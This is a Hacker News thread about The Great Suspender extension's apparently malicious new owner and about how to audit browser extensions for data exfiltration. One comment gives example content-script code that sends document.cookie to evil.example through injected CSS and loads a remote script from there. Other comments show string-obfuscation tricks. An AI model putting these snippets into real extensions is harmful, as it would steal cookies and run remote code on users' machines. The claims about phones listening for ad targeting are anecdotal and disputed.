The Great Suspender: New maintainer is probably malicious (github.com/greatsuspender)
389 points by AdamGibbins on Jan 3, 2021 | 178 comments


I am one of the few people who inspect the source code of extensions. It's easy to do; for Firefox, for example, just right-click and save-as on the extensions site, then rename the extension to a .zip file and extract it, e.g.:

    addon.xpi --> addon.zip
Then manually sift through the code looking for obvious malicious intent (or not-so-obvious malicious intent if the author is using obfuscation). Note: obfuscation is a red flag! A simple scan for `https://` / `http://` will usually yield interesting URLs where data is sent. I have actually spotted malicious addons in the wild this way and reported them to Mozilla. They were thankfully removed.
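
To make that first sweep concrete, here is a minimal sketch in Node (the ./addon path is just an example for wherever you extracted the archive; a real review obviously goes further than this):

    // scan-urls.js: list http(s) URLs found in an unpacked extension directory
    const fs = require('fs');
    const path = require('path');

    function walk(dir, out = []) {
      for (const entry of fs.readdirSync(dir, { withFileTypes: true })) {
        const p = path.join(dir, entry.name);
        entry.isDirectory() ? walk(p, out) : out.push(p);
      }
      return out;
    }

    const urlRe = /https?:\/\/[^\s"'()<>]+/g;
    for (const file of walk('./addon')) {
      if (!/\.(js|json|html|css)$/.test(file)) continue; // skip images etc.
      const text = fs.readFileSync(file, 'utf8');
      for (const url of text.match(urlRe) || []) console.log(file + ': ' + url);
    }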

Note: Obfuscation is NOT the same as minification, and I don't mean minification when using the word obfuscation!


Maybe Mozilla could list on the addon's page the domains/IP addresses where data is being sent. A bit like a table of Nutritional Facts for food, but for extensions.


Wouldn’t that be impossible to do as you’d have to somehow execute every code path in the plugin? The domains don’t have to exist as strings - there are lots of ways to obfuscate network requests.


Depending on how you approach it, you either end up having to solve the halting problem (spoiler: it's impossible), or restricting what domains an addon can connect to (also impossible given the way addons work: they can inject arbitrary scripts into pages to make requests for them).


It's possible to make extensions declare which hostnames or registrable domains they need to communicate with. (Apart from the pages in which they can run, which is already defined with WebExtensions.)


But you have all the code and you know which functions/methods/etc. can make requests, so it should be trivial... either way, if it is not a solvable problem, there is a major problem in the design.


>But you have all the code and you know which functions/methods/etc. can make requests, so it should be trivial

but you can't. See the last part of my comment: "they can inject arbitrary scripts into pages to make requests for them".

>either way, if it is not a solvable problem, there is a major problem in the design.

Not really. It's like complaining that debuggers can impersonate programs they attach themselves to.


> they can inject arbitrary scripts into pages to make requests for them

disallow that behavior?

You could also just pull that code but it might change based on request origin...


Lots of the best extensions are basically "change this webpage when it loads to make it work better." You can't "disallow this behavior" without crippling them.


It could do all the processing locally, easily... what are you talking about?


>It could do all the processing locally, easily...

That's irrelevant. If you can make changes to the page, you can exfiltrate data. The security model for addons isn't designed with restricting an addon's network activity in mind, see my other post: https://news.ycombinator.com/item?id=25623281


Depends on what your addon does. Most addons modify the page in some way. It's also not limited to injecting JavaScript. You can also exfiltrate data by injecting CSS (e.g. doing something like background-image: url("http://evil.example/?payload=...")) or do JavaScript injection in alternate ways (e.g. adding a <script> element, or adding an onclick attribute).
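
For illustration only (not taken from any real addon, and assuming the page's CSP doesn't block it), the vectors described above could look like this in a content script, with no fetch/XHR call appearing anywhere in the extension's own code:

    // CSS injection: the browser itself makes the request when loading the image
    const style = document.createElement('style');
    style.textContent = 'body { background-image: url("https://evil.example/?payload=' +
      encodeURIComponent(document.cookie) + '") }';
    document.head.appendChild(style);

    // script injection: the page, not the extension, fetches and runs the remote code
    const s = document.createElement('script');
    s.src = 'https://evil.example/payload.js';
    document.head.appendChild(s);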


That's one of the most fundamental functions a browser extension could have


I think you’re right if you’re trying to enumerate where a plug-in will call. However, it’s also possible to require that a plug-in provide a list of domains it will call as part of its manifest, display that list to the user, and use it as a whitelist for network access by the plug-in.

This ends up having the same effect as magically determining where it’ll call, with a lot less work.
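
WebExtensions manifests already have a shape for this: host patterns under the permissions key (Manifest V2) gate which origins the extension's own pages can make cross-origin requests to. A minimal fragment:

    {
      "name": "Example Extension",
      "manifest_version": 2,
      "permissions": [
        "https://api.example.com/*"
      ]
    }

The proposal here amounts to surfacing that list to users and enforcing it for everything the extension does; the catch, as the reply below notes, is the injected-script loophole.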


Except the add-on can inject JS into webpages that you have open and let the page make connections outside the extension sandbox.


Also, it’s pretty easy to just proxy requests through a whitelisted server-side site, so https://good.com is all that shows, but it requests good.com?dest=https://evil.com


Calling a website good.com doesn't make it good. A site with open redirects is a bad site.


Is that why Mozilla is blocking all addons on mobile (except for the selected 11)? They need to fix that shit or start adding useful features to Firefox... Not sure why they aren't blocking all extensions on desktop too if they are so bad, though.


They're already bleeding market share badly to the Chromium family, and doing that would be quite a thick nail to their popularity coffin...


Ah, that’s clearly a big issue. Never mind.


If you enumerate the ways browsers can make network requests, and if you have access to the source code of the extension, you could prepend the code with a bit of JavaScript that replaces the various network-related functions and methods with code that logs and/or validates the URL before making a request.
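
A minimal sketch of that wrapping idea (the allowlist is hypothetical, and as the sibling thread points out, this cannot see requests made by scripts the extension injects into pages):

    // wrap fetch and XMLHttpRequest so every URL is logged and validated first
    const allowlist = ['https://api.example.com']; // hypothetical
    const allowed = (url) => allowlist.some((p) => String(url).startsWith(p));

    const realFetch = window.fetch;
    window.fetch = function (resource, init) {
      const url = resource instanceof Request ? resource.url : String(resource);
      console.log('fetch:', url);
      if (!allowed(url)) throw new Error('blocked: ' + url);
      return realFetch.call(this, resource, init);
    };

    const realOpen = XMLHttpRequest.prototype.open;
    XMLHttpRequest.prototype.open = function (method, url, ...rest) {
      console.log('xhr:', url);
      if (!allowed(url)) throw new Error('blocked: ' + url);
      return realOpen.call(this, method, url, ...rest);
    };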


The attacker's code will then inspect its environment to see if network loggers are being used, or whether it's running in a test environment (network location, machine fingerprint, etc.), and then adapt its behavior accordingly to avoid setting off any warnings.


No, I’m saying modify the source of the extension so that the extension can only make requests to a whitelist of urls. The extension might be able to disable malicious functionality or something, but you can be certain that it’s not making malicious requests.


On my Android tablet, an app checked whether my keyboard was US/EU (rain down the malware) or Russian/Chinese (keep the app as-is).

And this was Google Play verified with a million downloads.


So bad guys will route all traffic through a proxy instead? E.g.:

    this addon connects to:
    * https://484044b296.execute-api.us-east-1.amazonaws.com


I always considered proxies, URL shorteners, etc. to be suspicious in the first place. Some more investigation would be required in some cases.


>I always considered proxies, URL shorteners, etc. to be suspicious in the first place

It doesn't have to be as overt as making it look like a proxy (e.g. an endpoint that makes arbitrary HTTP requests on behalf of the caller). It can be as simple as changing the endpoint for the spying service from https://evil.example.com/api/ to https://484044b296.execute-api.us-east-1.amazonaws.com/evil/...

> Some more investigation would be required in some cases.

The point is that the "nutrition facts label" doesn't really do anything because it's trivial to bypass. If it becomes widespread I guarantee every malicious addon maker would adopt this tactic.


Of course it would not be the only element in the table. But either way, it would at least tell you that an extension is leaking data when it isn't supposed to leak data (for extensions that should not require an Internet connection).


I personally would find such an inscrutable name suspicious.


Why? Would connecting to "api.example.com" be less suspicious? The same issue would still be present (namely, smuggling requests to "shady" domains using a mundane domain), and the only difference would be that it demonstrates the author paid $10/yr for the domain.


I should be able to clearly determine the intention of any domain that an extension is going to call. Anything that tries to obfuscate the actual underlying purpose is a red flag.

One might not like Google analytics, but at least you know exactly what you’re going to get when someone calls analytics.google.com.


Perhaps there's even a need gap for a 'Little Snitch for browser extensions' as a browser extension (considering OS-level LS or similar usually gets the browser whitelisted for 80/443).

Is it even possible or would the sandbox prevent such an extension from functioning?


Yes, there are probably many extensions that make outside connections that don't add benefit to the user by doing so.

I wish I could block per-app connections on Linux like Little Snitch appears to allow on Mac.


Isn't Little Snitch essentially an interactive firewall? Rather than silently denying/allowing traffic, it needs the user's decision until a connection is whitelisted/blacklisted? Why would this not be possible on Linux? (other than that the app doesn't exist yet)


https://github.com/evilsocket/opensnitch

However, if you allow everything to 80/443, the extensions would still be able to connect to their servers. Maybe the browsers should add the ability to allow/deny connections per extension.

https://github.com/gustavo-iniguez-goya/opensnitch/issues/21


Every once in a while something comes up trying to be 'Little Snitch for Linux', but none has survived AFAIK. To be honest, one of the reasons I use macOS is for LS, and I've heard a few others say that too. But now that macOS is bypassing LS or limiting its function, or to put it simply doing weird network stuff, I'm planning to get back to Linux.


This is entirely possible, either by isolating the application into a network namespace (e.g. via firejail or systemd units), with SELinux labels, by running the process under a custom gid, or via various other mechanisms.


Anything is possible, but is it relatively easy to block all apps and keep a whitelist of allowed apps?


I have not done that on a desktop but have seen it on servers with SELinux: each service we added had to be labeled properly to get network access, one extra line in the deployment script. I'm not aware of any GUI tools though, if that's what you're asking. I think that's also the approach Android uses to enforce app permissions; they obviously have a GUI, but that doesn't integrate with normal desktop environments.


A single line in a deployment script is as simple as it can get. Thanks, I will need to give this a try.


Extensions used to be able to intercept even network requests triggered by browser internals and by other extensions. I think with WebExtensions this is no longer possible.


Correction: I meant that 80/443 usually gets allowed for the entire browser on Little Snitch, so browser extensions dialing something get through that.


> A bit like a table of Nutritional Facts for food, but for extensions.

Great idea!


You don't even need to do all that, just use https://robwu.nl/crxviewer/

and insert the URL of the extension, for example https://addons.mozilla.org/en-US/firefox/addon/decentraleyes... .


This may be fine, but do note that you're inserting an extra layer that you have to trust compared to inspecting the source that you know is on your local disk.

Should they choose to, nothing stops the site you've linked from masking malicious tidbits in code you request.


How do you distinguish minification from obfuscation? I mean, minified JS is essentially illegible to me.


Minifying usually doesn't touch string literals. If you have a function like connectToSite, and tell it to connect to "https://mysite.com/", then minification will rename connectToSite to just the letter "a", but the site URL stays the same and will be easy to search for in the code. If you want to connect to www.evil.com and make it not clear, you'd have to do stuff that results in longer code, like split it up into individual characters, add number values to them to get different characters, and string cat a bunch of them together to get the final URL string.
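
A sketch of that trick, using the hypothetical connectToSite from above (the character codes are just "www.evil.com" shifted down by one):

    // build "www.evil.com" at runtime so the string never appears in the source
    var codes = [118, 118, 118, 45, 100, 117, 104, 107, 45, 98, 110, 108];
    var host = codes.map(function (c) { return String.fromCharCode(c + 1); }).join('');
    connectToSite('https://' + host + '/');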


To me, minification will rename reallyClearFunctionName("string param") to a("string param"), while obfuscation would also encrypt the "string param" and then decrypt it at runtime. Minification's main purpose is to reduce size; obfuscation goes one step further and makes it difficult to understand what is going on. Side note: code can be obfuscated but "maxified" (if that is a thing).

Side note: the joke goes that Perl is a write-only language, as it is difficult to read and understand. Some twisted souls decided to create the Obfuscated Perl Contest: https://en.wikipedia.org/wiki/Obfuscated_Perl_Contest

For a list of some of the winners: https://www.foo.be/docs/tpj/issues/vol4_3/tpj0403-0017.html


Advanced minification might do more optimizations than just shortening names though. In the extreme case you might have a sort of optimizing compiler that performs the equivalent of `-Os` which can make code quite unreadable.

But yes, even that shouldn't be encrypting strings.


Sure. You could also imagine a better minifier compressing string constants to save even more size.


From what I understand, minification just involves removing line breaks and tabs and can be un-minified fairly easily with tools such as https://beautifier.io/. Obfuscation involves techniques such as changing function/variable names from human-readable to human-unreadable, changing certain strings to concatenated variations of themselves or base64-encoded versions, or other similar transformations.

e.g. original code:

    function NewObject()
    {
        var mainApiUrl="https://google.com";
    }

minified code:

    function NewObject(){var mainApiUrl="https://google.com";}

obfuscated code:

    var _0x8275=["\x68\x74\x74\x70\x73\x3A\x2F\x2F\x67\x6F\x6F\x67\x6C\x65\x2E\x63\x6F\x6D"];function ahyt56(){var _0xb40bx2=_0x8275[0]}
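    // note: the hex escapes in _0x8275 decode back to "https://google.com"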


Minifiers also reduce variable and function names to a minimal size, one character wherever possible. They do other things too... such as remove semicolons that are not needed (not in general possible, especially if you've gotten rid of line breaks, but can be done in the last statement of a block or function, for example.) The idea is to optimize for bits sent over the wire.

    function a(){var b="https://google.com"}

That's why it's difficult to read minified code even if it's not obfuscated to the further extent that you sometimes see in attack payloads.


They usually also reduce variable and function names to single letters, or as short a unique sequence as possible. E.g.,

  function a(){var b="https://google.com";}


You can run it through a beautifier and get it readable again.


I don't think that's true. I don't think any tool can automatically recreate meaningful symbol names once they have been destroyed (absent things like debuginfo, which is irrelevant in the javascript context).


Unfortunately, if you modify the extension at all, Mozilla will not allow you to use it in Firefox-branded browsers. So while it is nice that you can look, you cannot change anything if you use Firefox. This has been the case since Firefox 37. I assume Chrome jumped the shark even earlier.


If you are not going to list it on the store page, Mozilla has a process that allows you to get an add-on signed automatically, unlisted, without review (you do still need a free account).


It just highlights that the whole process is awkward security theater. The only security is Moz being able to revoke access.


That is basically the whole purpose of it: a kill switch used when everything is on fire. It allows them to deactivate widespread malware when they discover it. Although I have no idea whether it works or has ever been used.

On the other side, the Chrome store started to behave badly and ban extensions they don't like for random reasons after they implemented that.

About Mozilla, I don't know. Will they eventually be like that, or won't they?


Or just use the developer edition and enable unsigned extensions.


Developer Edition is a beta (or alpha, since it derives from the Aurora line, which came from alpha). You can say it doesn't have bugs, but it has more than release editions. In my experience, many more. Using a beta as a daily driver is not something to recommend.

Now, some distros like Debian have enough political power to get Mozilla to allow them to put Firefox branding on their altered, user-freedoms-respecting repo editions of FF release. But most don't. So the only way to use the actual release FF is to go outside your repos and use the unbranded version. Possible, of course, but tedious.


Even the Nightly is actually quite stable in my opinion. I've used Firefox Nightly daily for years and don't encounter major usability problems (startup crashes, page-not-rendering type problems), although it does sometimes have minor ones.


You can enable developer mode on release Chrome (or Edge Chromium, which is what I recommend) and use any extension you wish directly by loading the unpacked source directory.


That results in a big giant warning you have to dismiss every time you start Chrome. Although that isn't available on release-channel branded Firefox anyway.


> Note: obfuscation is a red flag

And why is this? Unless the extension source is already public, I don't see any reason why anyone would not use obfuscation


I've found extensions doing malicious things that were not obfuscated, by inspecting the code. Obfuscated code is just not worth installing at all. Too much work, for little benefit, to review it, when alternatives exist.


> And why is this?

I'm not saying all obfuscation is necessarily bad, just something to look out for if you're trying to sleuth around for malicious intent by the addon's author.

Typically, if you want to hide the fact that you are collecting the browsing secrets of the addon's users, you would use some form of obfuscation (in order to keep the addon in good standing with Mozilla and to stop a simple sweep by people like myself who first look for things like http:/https: in the source).

Note: Obfuscation is NOT the same as minification, and I don't mean minification when using the word obfuscation!


There is no reason /to/ use obfuscation in good faith if the code is open source.


Then it’s a sign that they haven’t open sourced their extension, which is a red flag. Minification may be acceptable though pointless.


Minification isn’t necessarily pointless, depending on the tooling used. While the JS doesn’t have a wire cost, it does have a parsing and execution cost. Optimizing compilers like (say) Google Closure Compiler can significantly improve runtime cost, which is definitely a benefit for extension users.

That said, any extension using those tools without source code available and build verification should definitely be viewed with suspicion.


Note: Obfuscation is NOT the same as minification, and I don't mean minification when using the word obfuscation!


I've been telling everyone who will listen[1][2][3] that, as an extension developer, I'd love to be able to guarantee through the Chrome Web Store that an extension matches a git commit (or auditable build pipeline artifact) exactly.

It wouldn't fix everything (for example, you could still put a payload in an innocent-looking dependency), but it would at least fix the blatant problem that a maintainer can add code when uploading an extension even if the extension itself is open source and therefore (appears to be) auditable.
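
As a sketch of what "matches exactly" could mean mechanically (nothing any store implements today; the path is made up): compute a deterministic digest over the unpacked extension and compare it with the same digest computed from a clean checkout of the tagged commit:

    // deterministic sha256 over every file in an unpacked extension directory
    const crypto = require('crypto');
    const fs = require('fs');
    const path = require('path');

    function hashDir(dir) {
      const files = [];
      (function walk(d) {
        const entries = fs.readdirSync(d, { withFileTypes: true })
          .sort((a, b) => a.name.localeCompare(b.name)); // stable order
        for (const e of entries) {
          const p = path.join(d, e.name);
          e.isDirectory() ? walk(p) : files.push(p);
        }
      })(dir);
      const h = crypto.createHash('sha256');
      for (const f of files) {
        h.update(path.relative(dir, f)); // include the path in the digest
        h.update(fs.readFileSync(f));
      }
      return h.digest('hex');
    }

    console.log(hashDir('./unpacked-extension'));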

[1] https://news.ycombinator.com/item?id=23265699 [2] https://news.ycombinator.com/item?id=16881343 [3] https://news.ycombinator.com/item?id=16317686


What's the difference between auditing an extension's code on github vs auditing the code from the Chrome store? It seems like anyone who is willing to do an audit can just as easily download the code directly. Sites like Duo's crxcavator [1] also do exactly that.

[1]: https://crxcavator.io/


(1) Practical. Many people look at git repos. No one audits with crxcavator.

(2) Traceability. git has secure hashes, and things can't change when you're not looking.

My experience is that Google cares deeply about its own security, but not much about the security of its users. This sort of change is reasonable, but completely outside of Google's psyche. Google will

(1) Silently disable Android updates, leaving many running exploitable phones

(2) Hold back security tools for Google Apps without a premium subscription. If your account was compromised, you have no way to do audits to understand what happened without $$$, which leads to many more attackers.

(3) Expires Chromebooks rather quickly. Fortunately, unlike Android, it lets users know, but given the target market, many can't afford to upgrade.

(4) Runs appstores full of malware. When malware is discovered, users have no way to know what it did. They're just notified malware existed.

(5) Doesn't allow any sort of reasonable sandboxing of Android apps. If an app asks for filesystem, maps, and other permissions, you need to agree to all of them to run the app. I can't have Android give a dummy location or otherwise feed an app fake data.

Given that the bulk of Google's business model is built on mass surveillance for advertising, with users-as-statistics, this isn't too surprising, but it's something to be aware of if you use Google.

I firmly believe in civil liability for software companies which ship insecure products. They shouldn't be able to externalize costs like this. Follow good security practices, or your insurance premiums go up.


I'm only going to address 1) and 2) since the rest doesn't seem related to Chrome extensions.

1) Again, anyone who is willing to audit extension code can easily download it.

2) Extensions are auto-updating, so under the proposed solution the git hash would simply update with the new (say, backdoored) code. The fact that the extension is tied to a git commit hash has done nothing to protect you.


If an extension is open source, there are usually already some eyes on the GitHub codebase. If an extension version is pinned to a git hash, all those eyes could potentially spot that something is amiss.


We need to talk about how difficult it is to monetize browser extensions. Most of these problems occur when a reputable extension gets sold to a less reputable owner, frequently for a relatively small amount of money (4-5 figures). Even very popular extensions have a hard time monetizing. Unfortunately, Chrome has recently made the situation worse by deprecating Chrome Web Store payments, and Firefox eliminated their paid extension store several years ago.

If the only way to monetize an extension is to exploit its users for data, this kind of thing is going to keep happening. It's perfectly understandable how someone who is doing a lot of work for no pay will eventually get tired of it or have other priorities in life, which is what happened in this case. Perhaps we all need to stop taking it for granted that browser extensions ought to be free? Or maybe the browser vendors themselves can find ways of financially supporting extension authors. I feel that money is essential to both the problem and the solution.

Of course, paid upfront software gets sold to new owners too. But if the software is paid upfront, the expectation is that the new owner will perhaps do a better job of maintaining and marketing the software, and that's why the new owner buys it. When the software is paid, the new owner has an opportunity to make money legitimately, without secretly exploiting the existing user base.


I think we need to also talk more about our legal system's inability/unwillingness to deal with malware-like behavior that should definitely fall afoul of the CFAA. Being in an industry where monetization is difficult shouldn't be a free pass to behave maliciously like that.

The problem here isn't exploiting users' data; that is not necessarily bad, as long as the user is kept informed and accepts it. The problem is that the current maintainers are essentially handing over code-execution privileges on millions of machines to an untrustworthy actor, and that actor intentionally exploits this to run spyware-like code on those machines without the users' knowledge or consent.


The same could be said of Web Payments in general btw. The prime mover behind the rise of adtech was lack of any standards or easy usage for payment acceptance on the Internet.

When you can't accept money for your work, selling data instead seems to be the only business model for the Internet (sadly)


> The prime mover behind the rise of adtech was lack of any standards or easy usage for payment acceptance on the Internet.

I disagree. Online commerce has always been very healthy and pervasive almost since the beginning of the web. Payments were never the problem they're sometimes made out to be. "Standards" are completely unnecessary except for the de facto standards of MasterCard and Visa that predated the web.

The rise of adtech is explained simply: many if not most consumers make decisions based on the price of the product, and nothing beats a price of free! If you can offer a product that's free and still make a profit from it by selling ads, then you have a huge advantage over non-free competitors. For physical products, that's nearly impossible, but for virtual products it's quite feasible.

Paid upfront software has a long history on the web, despite the Orwellian revisionism of the App Store apologists who want to erase the past. Even paid upfront software plugins sold on the web have a long history. Web browser plugins and extensions, on the other hand, have tended to be free. This may be the result of most web browsers being free, or included with the operating system. Firefox is free, Chrome is included with Android and free otherwise, Safari is included with macOS/iOS, Internet Explorer was and now Microsoft Edge is included with Windows. The browsers themselves never made a point of taking payments, and so browser extensions were never really designed by the browser vendors with taking payments as a priority. It's kind of an historical accident, but one the browser vendors don't seem to be interested in correcting. Although now for better or worse, Safari web extensions can only be distributed via the Mac App Store.


"Online commerce has always been very healthy and pervasive almost since the beginning of the web."

Actually, in the very early days of the Web, I was personally ridiculed by advertisers I approached with the idea of advertising online. Almost every single one I approached stated quite clearly that they were certain the web was "just a passing fad" and that "normal" people wouldn't be interested in it. They all thought advertising online was a waste of time and money.

Somehow we've gone from that to pretty much the entire advertising industry having convinced the world that the Internet could not survive without online advertising, and that they somehow have a right to spy on us all to achieve their ends, and almost nobody seems to care that we've been giving away more and more of our privacy to these unsavory characters.

"'Standards' are completely unnecessary except for the de facto standards of MasterCard and Visa that predated the web."

The web (and the Internet in general) would not exist as it does today, were it not for the existence of agreed upon standards. The entire infrastructure of the Internet is built upon standards of communication which ensure that communication between devices is even possible. Without those standards, it'd all fall apart at the seams.

"many if not most consumers make decisions based on the price of the product, and nothing beats a price of free!"

Actually, during the time I speak of above, it was also extremely common for most people to think that "free" = "garbage", and that only paid products were worth a damn. If something was given away for free, it was either a trick to get you to buy something, or it was something you wouldn't want anyway, because if it was worth anything, then it wouldn't be given away for free.


> We need to talk about how difficult it is to monetize browser extensions.

Sounds like a feature to me :)


Yes, a feature that results in the user details of millions of innocent users getting harvested. Remind us your contact details again, so we can forward them to the FBI?


I would much rather live in a world where people are aware of that possible problem than a world where paid extensions were the norm.

e: If there were paid extensions there would be pirated extensions and this problem would be even more common imo :)


The culpability of Dean Oemcke in this particular incident should not be understated. Hindsight is hindsight, of course, but the fact that the new owner of the platform distribution rights of this open-source project was (and apparently remains) anonymous seems like it ought to have been a huge red flag. The fact that these rights were paid for made it obvious that monetization was pending. The lack of transparency made it obvious that the form of that monetization would not be acceptable to the contributing community.

There might be a way of contesting the rights to the project name but that would require legal activism and external funding. Basically the original project is dead insofar as the contributors are not comfortable with supporting a parasitic and probably malicious actor. I guess a fork is inevitable. Meanwhile the parasite will harvest the value of the 'brand', distribution rights, and existing codebase until it is drained by obsolescence.

A really disgusting way to treat a community by both parties. One can only hope that Mr. Oemcke desperately needed the money for some vital purpose.


Isn't this a huge vulnerability that rises to the level of "Chrome team should police this"?

I mean, just thinking of potential threats (because of which I'm now removing the extension):

-- corporate web pages potentially sniffable if installed on work computer

-- personal passwords, password manager traffic

The potentially malicious actor is able to just scoop up any domain's encrypted traffic, aren't they? Or is there any practical assurance that they're only gathering domain names, high-level traffic stats, etc.?


At my company, our Macs are all managed with policies and we have a strict subset of Chrome extensions allowed for install. All of which have been vetted by our security team. Most allowed are owned by large companies. As my company is not FAANG, I would imagine this is common at many companies.


> we have a strict subset of Chrome extensions allowed for install. All of which have been vetted by our security team.

How do you handle a situation like this, where an extension was previously trusted (and would therefore have passed your vetting procedure), then acquired by somebody else who is apparently malicious? Do you review every new version?


I think that’s what he was getting at when he said:

> Most allowed are owned by large companies.

He was implying that big companies are not in the business of selling their extensions. Smaller actors are more susceptible to this.


In a word, yes. When you install an extension and it says “has access to all the data on all web sites you visit”, this means all of your passwords and cookies can be recorded and sent to any other domain.


Would some agent be recording and transmitting the content of webpages in full, broadly? Or just capturing user-entered information?


Yes, and definitely. Here's an example from the NanoBlock vs uBlock Origin controversy where cookies and private data were being harvested

https://github.com/NanoAdblocker/NanoCore/issues/362#issueco...

Assume that any time an app has privilege to access your data, they are going to do it either deliberately or accidentally.


I recently tried to find a health-related tracking app on the Apple App Store in order to conveniently track and manage my health, but I noticed that I cannot trust any offered app anymore, regardless of whether it's paid or free.

This may be because of the proliferation of *-analytics, the broad openness of supposedly sandboxed systems, the needless availability of fingerprinting methods, and the lack of proof of privacy commitment by the vendors (and any published privacy policy is not enough), or because I just became too paranoid (or both?).

Examples like these validate the suspicion that you can’t trust any app or plug-in anymore, with big vendors being in an in-between position of “too big to lose trust”.

I wonder when we will reach the point where there is no trusted web browser anymore, no trusted computer appliance. When will it be that you cannot even say a word to a person in-person anymore because it lands in a weakly secured cloud by the microphone inside their smartwatch that runs a weather app that is run by crooks. Or is that point reached already?


I've reached a stage where my first action after installing an app is to do a packet capture and look at what the app talks to. Sadly in the majority of cases the app gets promptly uninstalled because it ends up talking to Facebook or similarly-malicious endpoints for no good reason (even paid healthcare or accounting apps do this).

Doing this enough times I can mostly predict the result by just looking at the app and who's behind it so I no longer bother with apps and stick to the built-ins whenever possible.


> my first action after installing an app is to do a packet capture and look at what the app talks to

Can’t it talk to its own servers that then talk to Facebook, in which case packet capture is of not much use?


I agree, it's not a foolproof solution, but the presence/absence of various trackers in their app and website is usually a good predictor.

Furthermore in the name of pragmatism I am not opposed to all ad targeting; some of it is indeed outside of my control. However, there's a difference between sending a name/email address combo once during signup and having the advertising SDK ping the advertiser every single time the app is interacted with (which is what the Facebook SDK does for example); the former only leaks "I use X service" once to the advertiser, the latter leaks a detailed trail of my usage patterns & IP addresses (can be used to correlate where I've been and who I'm hanging out with if their own phones are connected to the same Wi-Fi network and thus share the same IP).


> When will it be that you cannot even say a word to a person in-person anymore because it lands in a weakly secured cloud by the microphone inside their smartwatch that runs a weather app that is run by crooks.

I believe it can already be the case with Google’s (and possibly Facebook’s) apps on Android. At least in the case of Google, I witnessed real-life tests showing how saying something in the presence of the phone causes related ads and content to be shown in feeds. But it’s scarier with less scrupulous app maintainers.

Disclaimer: I am not claiming that the Android API grants all apps unauthorized access to an always-on mic. The device in question was configured by its owner to enable continuous listening. I am not claiming voice recordings are stored or used in nefarious ways.


Citations please. Not because I think you're definitely fear mongering, but because real evidence would be important to see.


An owner of a Google-branded Android phone demonstrated it to me last year, it worked remarkably fast. IIRC, the example chosen was Google News.

I can’t see how this is fear mongering. The device was not acting against its owner’s will: that person specifically does not tighten the relevant privacy settings and enables the always-on mic because they see useful content suggestions as a feature.

It is different from my outlook (and I take it yours too), but I think that point of view deserves the right to exist.

The issue is that now when I am talking to someone like that in real life, I know I may be implicitly agreeing that Google would pick up my speech as well. It’s a clash similar to one between a person (e.g., my mom) who grants messenger apps full access to their phone’s address book for convenience, and their contact (e.g., myself) who does not want their information to be shared with Facebook et al.

Addendum: a cursory search confirms this experience.

https://www.vice.com/en/article/wjbzzy/your-phone-is-listeni...

https://www.makeuseof.com/tag/your-smartphone-listening-or-c... (2019)

https://www.quora.com/Does-Google-listen-to-my-conversations... (the first answer does not mention ads, but others share similar experience to what I saw)

Counterpoint: https://www.bbc.co.uk/news/technology-49585682 “phones that secretly listen to us are a myth” (2019). Notably, with all my respect for the BBC, this article lacks a lot of context (did they turn off voice activation before testing? what were their privacy settings?), and to test devices listening they played commercials in the presence of the phone rather than using voice (I have relatively high confidence that modern devices can easily distinguish between speech nearby and sound from a commercial before a recording leaves the phone).

Some sources claim that as of last year Google is changing the way their apps work. Not sure if they stop listening or stop showing relevant content.

(I don’t personally own an Android phone, and even if I did I would have turned off virtual assistants & disabled always-on mic just as I do with my iPhone, so I wouldn’t be able to present first-hand proof.)


What's described in the article is hotword-activated? So not at all what GP is supposing. If you say "Hey Google, tell me about toilet paper" and get ads for toilet paper, that's a fairly understandable cause => effect, but there are persistent anecdotes about conversations manifesting in ads where no hotword activation occurs (typically about Facebook.)

Every company vehemently denies this is possible.


I find this hard to believe because I’d think constant voice recognition would either have a noticeable impact on battery life or it’d have a major impact on data usage. Also, on iOS at least, it’d have to be provided by Apple, to be a constant background thing, and then Apple would already be using it for Siri.


If always-on mic for virtual assistant activation is enabled, it does impact battery life.

Regarding iOS, I hadn’t observed ads obviously based on what I spoke about in presence of my iPhone, but then I don’t use voice-activated Siri and generally tighten up privacy settings.


I’ve never noticed this myself: I’ve always assumed that what is actually going on is that people’s phone usage is more correlated with what they’re thinking/talking about than they realize and ad companies have gotten pretty good at uncovering these latent connections (e.g. the story about Target deducing someone was pregnant from seemingly unrelated shopping patterns).


I remember that story. However, what I observed with Android’s Google (or is it called Google News?) app last year was a tight feedback loop: after talking a little about %SUBJECT% near the phone, and refreshing the feed within the next minute or two, a relevant article from past few days showed up.

(Similar to Vice’s article I linked, but faster.)

Again, the owner of the device saw that as a convenience feature and consciously did not set the phone up to prevent it, which made me feel a little old-fashioned and unnecessarily paranoid.

Also, unlike Vice’s article, in the scenario I have witnessed the recording did not necessarily have to leave the phone: the news app could have kept a large cache of recent articles and locally pick the ones matching the %SUBJECT% that we spoke about.

I am inclined to believe that Google, given their business model and scale, is unlikely to store voice data insecurely or insufficiently de-anonymized, so I’m primarily worried about third-party apps getting access to always-on microphone without visual feedback. (Hopefully it’s not very likely and app stores have tools to detect nefarious uses of relevant APIs at review stage.)


I’d like to see an actual technical write up of this: network logs, tracing of the android device activity etc. My original impression was that the reason why mobile voice assistants have trigger words is that anything more complicated isn’t feasible as an always-on feature. (Although, I do remember stories about the Facebook app using the microphone to suggest that you post a status update about the movie or tv show you’re watching, so maybe it’s more feasible than I imagine).


You won't find one because it doesn't exist.

As a person who's made a living the last few years working in the guts of Android on embedded devices, I can tell you there are so many holes in this way-too-common myth that phones are listening all the time.

You don't even need to dive into the technical aspect of it, what on earth is the risk reward here?!

Risk: Forever break the trust people have in your devices, this isn't some grey area intrusive tracking that would just get swept under the rug...

Reward: Get noisy info about people's interests when you literally own the device that contains more information about them than their own short-term memory does!

It's nonsensical, and there's no way that Google could do this that wouldn't already have been caught.

I mean, is the theory that all Google devices do it and somehow no OEM has realized their microphone is getting accessed? (Because even with the lowest-level access on the device, modern microphones are not so unsophisticated; there's no universal way to access one in a way a manufacturer wouldn't catch onto sooner or later.)

Or Google did this but only on phones they own or something?

It's nonsense.


> You won't find one because it doesn't exist.

There is no proof it happens, and no proof it doesn’t happen, because it’s non-trivial to detect based on network activity. The only evidence is observing content relevant to what was being spoken about being suggested across apps.

> Risk: Forever break the trust people have in your devices, this isn't some grey area intrusive tracking that would just get swept under the rug...

Reward: get people to love your services for relevant suggestions. Believe it or not, there are people outside the extra privacy-conscious bubble who do not at all mind their devices listening.

> Or Google did this but only on phones they own or something?

I am pretty sure this depends on software. I have seen this demonstrated on a Google-branded phone with a Google app.


> Reward: get people to love your services for relevant suggestions. Believe it or not, there are people outside the extra privacy-conscious bubble who do not at all mind their devices listening.

Like I already pointed out this is nonsense.

Always-on listening, even with perfect parsing, would be INCREDIBLY noisy. There are a million and one reasons for a term to come up in speech. The simplest conversation could surface hundreds of targeting terms.

